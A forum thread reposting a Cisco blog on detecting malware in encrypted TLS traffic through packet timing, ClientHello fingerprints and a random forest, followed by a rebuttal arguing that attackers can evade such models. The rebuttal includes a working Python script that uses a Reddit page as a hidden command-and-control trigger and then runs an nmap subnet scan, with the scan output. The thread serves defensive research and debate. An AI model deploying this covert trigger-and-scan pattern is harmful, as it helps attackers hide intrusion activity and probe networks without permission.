Detecting Encrypted Malware Traffic (Without Decryption)

In2an3_PpG · Oct 19, 2018

Older blog but a good read.

Introduction

Over the past 2 years, we have been systematically collecting and analyzing malware-generated packet captures. During this time, we have observed a steady increase in the percentage of malware samples using TLS-based encryption to evade detection. In August 2015, 2.21% of the malware samples used TLS, increasing to 21.44% in May 2017. During that same time frame, 0.12% of the malware samples used TLS and made no unencrypted connections with HTTP, increasing to 4.45%.

Identifying threats contained within encrypted network traffic poses a unique set of challenges. It is important to monitor this traffic for threats and malware, but to do so in a way that maintains the privacy of the user. Because pattern matching is less effective in the presence of TLS sessions, we needed to develop new methods that can accurately detect malware communication in this setting [1,2,3]. To this end, we used the flow’s individual packet lengths and inter-arrival times to understand the behavioral characteristics of the transmitted data, and we used the TLS metadata contained in the ClientHello to understand the TLS client that is transmitting the data. We combine both of these views in a supervised machine learning framework, allowing us to detect both known and unknown threats in TLS communication.

As an overview, Figure 1 provides a simplified view of a TLS session. In TLS 1.2 [4], the majority of the interesting TLS handshake messages are unencrypted, and are displayed in red in Figure 1. All of the TLS-specific information that we use for classification comes from the ClientHello, which will also be accessible in TLS 1.3 [7].

Data

Throughout the life of this project, we have maintained that the data is at the heart of our success. We have teamed with ThreatGrid and Cisco Infosec to acquire malicious packet captures and live enterprise data. These data feeds have helped to guide our analysis and develop the characteristics of a flow that are most informative. To provide some intuition about why the data features that we have analyzed are interesting, we first focus on a particular malware sample, bestafera, which is known for keylogging and data exfiltration.

Behavioral Analysis through Packet Lengths and Times

Figure 2 shows the packet lengths and inter-arrival times for two different TLS sessions: a Google search in Figure 2a and a bestafera-initiated connection in Figure 2b. The x-axis represents time, the upward lines represent the size of packets that are sent from the client/source to the server/destination, and the downward lines represent the size of packets that are sent from the server to the client. The red lines again represent unencrypted messages, and the black lines are the sizes of the encrypted application_data records.

The Google search follows a typical pattern: the client’s initial request is in a small outbound packet, followed by a large response spanning many MTU-sized packets. The several packets going back and forth are due to Google attempting to auto-complete my search while I was still typing. Finally, Google thought it had a pretty good idea what I was typing, and sent an updated set of results. The server that bestafera communicated with began by sending a packet containing a self-signed certificate, which can be seen as the first downward, thin red line in Figure 2b. After the handshake, the client immediately began exfiltrating data to the server. There was a pause, and then the server sent a regularly scheduled command and control message. Packet lengths and inter-arrival times can’t provide deep insight about the contents of a session, but they do facilitate inferences about the behavioral aspects of a session.
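
As a rough illustration of the per-packet view described above, the sketch below turns a list of observed packets into signed lengths and inter-arrival times. The Packet record, its field names, and the sample values are assumptions made for illustration; they are not taken from the original tooling.

```python
from typing import List, NamedTuple, Tuple


class Packet(NamedTuple):
    """Hypothetical per-packet record; the field names are illustrative."""
    timestamp: float    # seconds since the start of the capture
    length: int         # payload size in bytes
    from_client: bool   # True if sent from client to server


def lengths_and_gaps(packets: List[Packet]) -> Tuple[List[int], List[float]]:
    """Return signed packet lengths and inter-arrival times for one flow.

    Client-to-server lengths are positive and server-to-client lengths are
    negative, mirroring the upward and downward lines in the figure.
    """
    ordered = sorted(packets, key=lambda p: p.timestamp)
    signed = [p.length if p.from_client else -p.length for p in ordered]
    gaps = [b.timestamp - a.timestamp for a, b in zip(ordered, ordered[1:])]
    return signed, gaps


# Made-up flow: a small request, two large responses, then a long pause.
flow = [
    Packet(0.00, 120, True),
    Packet(0.05, 1460, False),
    Packet(0.06, 1460, False),
    Packet(5.00, 300, True),
]
signed_lengths, gaps = lengths_and_gaps(flow)
print(signed_lengths)
print([round(g, 2) for g in gaps])
```

A long gap followed by a small, regular message is the kind of pattern that such a view can expose without looking at any payload.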

Fingerprinting the Application with TLS Metadata

The TLS ClientHello message provides two particularly interesting pieces of information that can be used to distinguish different TLS libraries and applications. The client offers a server a list of suitable cipher suites ordered in the preference of the client. Each cipher suite defines a set of methods, such as the encryption algorithm and pseudorandom function, that will be needed to establish a connection and transmit data using TLS. The client can also advertise a set of TLS extensions that, among other things, can provide the server with parameters needed for the key exchange, for example ec_point_formats.
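
To make the two ClientHello fields concrete, here is a minimal parsing sketch. It assumes the ClientHello arrives in a single, unfragmented TLS record and follows the TLS 1.2 wire layout; the function names and the hand-built example message are hypothetical, and this is not the parser used in the original work.

```python
import struct
from typing import List, Tuple


def parse_client_hello(record: bytes) -> Tuple[List[int], List[int]]:
    """Return (cipher_suites, extension_types) from a raw TLS record."""
    if len(record) < 9 or record[0] != 0x16 or record[5] != 0x01:
        raise ValueError("not a handshake record carrying a ClientHello")
    pos = 5 + 4                 # record header (5) + handshake header (4)
    pos += 2 + 32               # client_version + random
    pos += 1 + record[pos]      # session_id length byte + session_id
    (suites_len,) = struct.unpack_from("!H", record, pos)
    pos += 2
    suites = list(struct.unpack_from("!%dH" % (suites_len // 2), record, pos))
    pos += suites_len
    pos += 1 + record[pos]      # compression_methods length byte + methods
    extensions: List[int] = []
    if pos + 2 <= len(record):  # the extensions block is optional
        (ext_total,) = struct.unpack_from("!H", record, pos)
        pos += 2
        end = pos + ext_total
        while pos + 4 <= end:
            ext_type, ext_len = struct.unpack_from("!HH", record, pos)
            extensions.append(ext_type)
            pos += 4 + ext_len
    return suites, extensions


def build_example_hello() -> bytes:
    """Hand-assemble a tiny ClientHello for demonstration only."""
    suites = struct.pack("!3H", 0xC02F, 0xC030, 0x009C)
    # ec_point_formats (type 11): one format, uncompressed.
    point_formats = struct.pack("!HH", 0x000B, 2) + b"\x01\x00"
    # supported_groups (type 10): one group, secp256r1.
    groups = struct.pack("!HH", 0x000A, 4) + struct.pack("!HH", 2, 0x0017)
    extensions = point_formats + groups
    body = (
        b"\x03\x03"                                # client_version: TLS 1.2
        + bytes(32)                                # random (zeroed here)
        + b"\x00"                                  # empty session_id
        + struct.pack("!H", len(suites)) + suites
        + b"\x01\x00"                              # null compression only
        + struct.pack("!H", len(extensions)) + extensions
    )
    handshake = b"\x01" + len(body).to_bytes(3, "big") + body
    return b"\x16\x03\x01" + struct.pack("!H", len(handshake)) + handshake


suites, extension_types = parse_client_hello(build_example_hello())
print([hex(s) for s in suites], extension_types)
```

The order of both lists is preserved on purpose, since the client's preference order is part of what distinguishes one TLS client from another.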

The cipher suite offer vectors can vary in both the number of unique cipher suites offered and the different subgroups offered. Similarly, the list of extensions varies based on the context of the connection. Because most applications typically have different priorities, these lists can and do contain a great deal of discriminatory information in practice. As an example, desktop browsers tend to favor heavier weight, more secure encryption algorithms, mobile applications favor more efficient encryption algorithms, and the default cipher suite offer vector of clients bundled with TLS libraries typically offers a wider range of cipher suites to help with testing server configurations.

Most user-level applications, and by extension a large number of TLS connections seen in the wild, use popular TLS libraries such as BoringSSL, NSS, or OpenSSL. These applications usually have unique TLS fingerprints because the developer will modify the defaults of the library to optimize their application. To be more explicit, the TLS fingerprint for s_client from OpenSSL 1.0.1r will most likely be different from that of an application that uses OpenSSL 1.0.1r to communicate. This is also why bestafera’s TLS fingerprint is both interesting and unique: it uses the default settings of OpenSSL 1.0.1r to create its TLS connections.

Applying Machine Learning

Feature Representation

For this blog post, we have focused on straightforward feature representations of three data types: traditional NetFlow, packet lengths, and information taken from the TLS ClientHello. These data types are all extracted from a single TLS session, but we have also developed models that incorporate features from multiple flows [1]. All features were normalized to have zero mean and unit variance before training.
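
The normalization step can be sketched in a few lines. This is a minimal illustration, assuming the population standard deviation is used and that constant columns are mapped to zero; the post does not state either detail, and the function name is hypothetical.

```python
from statistics import mean, pstdev
from typing import List


def standardize(rows: List[List[float]]) -> List[List[float]]:
    """Scale each feature column to zero mean and unit variance.

    Constant columns are mapped to 0.0 to avoid dividing by zero
    (an assumption; the source does not say how they were handled).
    """
    columns = list(zip(*rows))
    means = [mean(col) for col in columns]
    stds = [pstdev(col) for col in columns]
    return [
        [(x - m) / s if s > 0 else 0.0 for x, m, s in zip(row, means, stds)]
        for row in rows
    ]


# Made-up feature rows: the second column is constant.
scaled = standardize([[1.0, 10.0], [2.0, 10.0], [3.0, 10.0]])
print(scaled)
```

In a deployment setting, the means and standard deviations would normally be computed on the training data and reused unchanged on new flows.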

Legacy. We utilized 5 features that are present in traditional NetFlow: the duration of the flow, the number of packets sent from the client, the number of packets sent from the server, the number of bytes sent from the client, and the number of bytes sent from the server.
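
A minimal sketch of how these five values might be derived from one flow's packets. The (timestamp, size, from_client) record layout and the function name are assumptions for illustration, not the NetFlow exporter's actual format.

```python
from typing import List, Tuple

# (timestamp_seconds, size_bytes, from_client): a hypothetical record layout.
PacketRecord = Tuple[float, int, bool]


def legacy_features(packets: List[PacketRecord]) -> List[float]:
    """Return [duration, client_pkts, server_pkts, client_bytes, server_bytes]."""
    if not packets:
        return [0.0, 0.0, 0.0, 0.0, 0.0]
    times = [t for t, _, _ in packets]
    client = [size for _, size, from_client in packets if from_client]
    server = [size for _, size, from_client in packets if not from_client]
    return [
        max(times) - min(times),   # duration of the flow
        float(len(client)),        # packets sent from the client
        float(len(server)),        # packets sent from the server
        float(sum(client)),        # bytes sent from the client
        float(sum(server)),        # bytes sent from the server
    ]


# Made-up flow with two packets in each direction.
example_flow = [(0.0, 120, True), (0.05, 1460, False),
                (0.06, 1460, False), (5.0, 300, True)]
legacy = legacy_features(example_flow)
print(legacy)
```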

Sequence of Packet Lengths (SPL). We create a length-20 feature vector, where each entry is the corresponding packet size in the bidirectional flow. Packet sizes from the client to the server are positive, and packet sizes from the server to the client are negative.
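
The SPL vector can be sketched as below. Two details are assumptions that the post does not specify: that the first 20 packets of the flow are used, and that shorter flows are padded with zeros. The function name is hypothetical.

```python
from typing import List, Sequence


def spl_features(signed_lengths: Sequence[int], size: int = 20) -> List[int]:
    """Truncate or zero-pad signed packet lengths to a fixed-size vector.

    Positive entries are client-to-server packets and negative entries are
    server-to-client packets. Zero padding is an assumption.
    """
    head = list(signed_lengths[:size])
    return head + [0] * (size - len(head))


# A short made-up flow is padded; a long one is truncated.
short_vector = spl_features([120, -1460, -1460, 300])
long_vector = spl_features(list(range(1, 31)))
print(short_vector)
print(long_vector)
```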

TLS Metadata (TLS). We analyze both the offered cipher suite list and the list of advertised extensions contained in the ClientHello message. In our datasets, we observed 176 unique cipher suites and 21 unique extensions, which resulted in a length-197 binary feature vector. The appropriate feature is set to 1 if that cipher suite or extension appeared in the ClientHello message.
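
The binary encoding can be illustrated with a much smaller vocabulary than the 176 cipher suites and 21 extensions observed in the post's datasets. The vocabularies, their ordering, and the function name below are hypothetical.

```python
from typing import Iterable, List, Sequence

# Hypothetical, tiny vocabularies; the real ones had 176 and 21 entries.
KNOWN_SUITES = [0x002F, 0x0035, 0x009C, 0xC02F, 0xC030]
KNOWN_EXTENSIONS = [0x0000, 0x000A, 0x000B, 0x000D]


def tls_features(
    suites: Iterable[int],
    extensions: Iterable[int],
    known_suites: Sequence[int] = KNOWN_SUITES,
    known_extensions: Sequence[int] = KNOWN_EXTENSIONS,
) -> List[int]:
    """Return a 0/1 vector marking which known suites/extensions were offered."""
    offered_suites = set(suites)
    offered_extensions = set(extensions)
    return (
        [1 if s in offered_suites else 0 for s in known_suites]
        + [1 if e in offered_extensions else 0 for e in known_extensions]
    )


# A made-up ClientHello offering three suites and two extensions.
tls_vector = tls_features([0xC02F, 0xC030, 0x009C], [0x000B, 0x000A])
print(tls_vector)
```

Note that this encoding records only presence, so the preference order of the offered cipher suites is not captured by the feature vector.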

Learning

All of the presented results use the scikit-learn random forest implementation [6]. Based on previous longitudinal studies that we conducted, the number of trees in the ensemble was set to 125, and the number of features considered at each split of the tree was set to the square root of the total number of features. The feature set used by the random forest model was composed of some subset of the Legacy, SPL, and/or TLS features depending on the experiment.
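
A sketch of a random forest configured with the hyperparameters stated above, using scikit-learn's RandomForestClassifier. The training data here is synthetic and the feature count is arbitrary; both are assumptions for illustration, and the fixed random_state is only there to make the sketch repeatable.

```python
import numpy as np
from sklearn.ensemble import RandomForestClassifier

# Synthetic stand-in data: 10 made-up features per flow, two classes.
rng = np.random.default_rng(0)
X_benign = rng.normal(0.0, 1.0, size=(200, 10))
X_malware = rng.normal(1.5, 1.0, size=(200, 10))
X = np.vstack([X_benign, X_malware])
y = np.array([0] * 200 + [1] * 200)   # 0 = benign, 1 = malware

model = RandomForestClassifier(
    n_estimators=125,      # number of trees, as stated in the post
    max_features="sqrt",   # sqrt(total features) considered at each split
    random_state=0,
)
model.fit(X, y)

# Probability that each flow is malware; thresholds are applied to this value.
malware_probability = model.predict_proba(X[:5])[:, 1]
print(malware_probability)
```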

Results

We sampled 1,621,910 TLS flows from one enterprise network, Site1, and 324,771 flows from ThreatGrid (collected between August 2015 and December 2016) to train our random forest model. We then simulated deploying the model on unseen data from a separate enterprise network, Site2, and malware data collected during the two months following the previous data set. There were 2,638,559 sampled TLS flows from Site2 and 57,822 TLS flows from ThreatGrid during January and February of 2017. Table 1 presents the results of this experiment at different thresholds. 0.5 is the default threshold of the classifier, and the higher the threshold, the more certain the trained model has to be to determine that the TLS flow was generated by malware. The malware/benign accuracies are kept separate to demonstrate feature subsets that overfit to a particular class. For example, Legacy can achieve near perfect accuracy on the benign set, but these features fail to generalize to the malware dataset.
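
The effect of the threshold on the two per-class accuracies can be sketched as follows. The scores and labels are made up, and treating a score greater than or equal to the threshold as a malware verdict is an assumption; the function name is hypothetical.

```python
from typing import List, Sequence, Tuple


def per_class_accuracy(
    scores: Sequence[float], labels: Sequence[int], threshold: float = 0.5
) -> Tuple[float, float]:
    """Return (benign_accuracy, malware_accuracy) at a decision threshold.

    labels use 1 for malware and 0 for benign. A flow is flagged as malware
    when its score is >= threshold. Both classes must be present.
    """
    benign: List[bool] = []
    malware: List[bool] = []
    for score, label in zip(scores, labels):
        flagged = score >= threshold
        if label == 1:
            malware.append(flagged)        # correct if flagged
        else:
            benign.append(not flagged)     # correct if not flagged
    if not benign or not malware:
        raise ValueError("need at least one flow of each class")
    return sum(benign) / len(benign), sum(malware) / len(malware)


# Made-up classifier scores: four benign flows, then four malware flows.
scores = [0.05, 0.20, 0.60, 0.97, 0.55, 0.96, 0.995, 0.999]
labels = [0, 0, 0, 0, 1, 1, 1, 1]
for t in (0.5, 0.95, 0.99):
    print(t, per_class_accuracy(scores, labels, t))
```

Raising the threshold trades malware detections for fewer benign flows being flagged, which is why the two accuracies are reported separately.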

At a threshold of 0.99, the classifier using the Legacy/SPL features correctly classified 98.95% of the benign samples and 69.81% of the malicious samples. These results improve significantly if we combine information about the application (TLS) with the behavioral characteristics of the network traffic (SPL). The combination of Legacy/SPL/TLS was the best performing model on the benign and malware samples. At a threshold of 0.95, this model achieved accuracies of 99.99% and 85.80% for the benign and malicious hold-out datasets, respectively.

Conclusion

Decryption solutions are not ideal in all settings due to privacy concerns, legal obligations, expense, or non-cooperating end-points. Cisco has devoted time (mine especially) to developing research and products to fill these gaps and complement current solutions. Our validation studies on real network data have shown that we can achieve reliable detection with minimal false positives. In addition to engaging Cisco product teams to further develop this work, we have spent time engaging a broader external audience through open source [5] and academic papers [1,2,3].

In2an3_PpG · Oct 22, 2018

Here is a response from someone also glancing through the /r/netsec - Information Security News & Discussion sub-Reddit and reading the old blog posted above.

Defeating Cisco’s Machine Learning Based Malware Traffic Detection Algorithm | Digital Operatives

Reading /r/netsec today, I happened to come across this recycled old 2017 blog post from Cisco security about detecting malware by applying machine learning to encrypted communications.

Admittedly, it’s an interesting idea. At some point malware started using encrypted communications to get around intrusion detection signatures that detected unencrypted bot traffic. Defenders had to improve their detection.

The question I have, though, is: “How realistic is it to detect a determined adversary who wants to evade a machine learning based approach to detecting C2?” From my perspective, it is pretty hard.

The Cisco blog post shows the success of their techniques on samples of malware from the wild. The story goes like this: a researcher compiles lots of data, good and bad, and uses machine learning techniques to draw something like the above image.

Researcher jumps up and down for joy, “I have 100% accuracy of detecting good traffic and 72.75% accuracy of detecting bad traffic!”
Here’s the problem. Attackers aren’t static. Once you deploy your model, attackers will build new C2 and test against it.

They’ll come up with something like this:

import urllib3
from subprocess import call

# Suppress urllib3 warnings so the script runs quietly.
urllib3.disable_warnings()

# Fetch the subreddit over HTTPS, much as an ordinary client would.
conn = urllib3.connection_from_url('https://www.reddit.com')
r = conn.request('GET', '/r/netsec/')
print("Status: " + str(r.status))

# The presence of the blog post's title on the page acts as the C2 trigger.
if b"Detecting Encrypted Malware Traffic (Without Decryption)" in r.data:
    print('Detected C2 Command - Launching portscan')
    call('nmap -sT 10.0.0.0/24 -p 22 > output.txt', shell=True)

The result will be:

python3 browser_comm.py
Status: 200
Detected C2 Command - Launching portscan
Starting Nmap 7.70 ( https://nmap.org ) at 2018-10-19 16:10 EDT
Nmap scan report for 10.0.0.10
Host is up (0.0080s latency).

PORT   STATE  SERVICE
22/tcp closed ssh

Nmap scan report for 10.0.0.15
Host is up (0.014s latency).

PORT   STATE  SERVICE
22/tcp closed ssh

Nmap scan report for 10.0.0.61
Host is up (0.017s latency).

PORT   STATE SERVICE
22/tcp open  ssh

Nmap scan report for 10.0.0.71
Host is up (0.011s latency).

PORT   STATE  SERVICE
22/tcp closed ssh

Nmap done: 256 IP addresses (4 hosts up) scanned in 2.24 seconds

Process finished with exit code 0

Then they’ll sleep for a few days and upload the results.

What am I really showing you here? The code above goes to Reddit, pulls the subreddit, and triggers a command to launch if something is detected in the page. The web is an incredibly dynamic place. There are places to put arbitrary information to trigger C2, places to store payloads, and places to dump results. I’m not arguing that it’s impossible to distinguish good from bad; I’m suggesting bad has numerous places to hide in what looks like good.

At the end of the day, determined attackers will attempt to fit the good model. A few years after they have success, some other researcher will claim to have a new model that detects old attacks. Rinse, repeat.
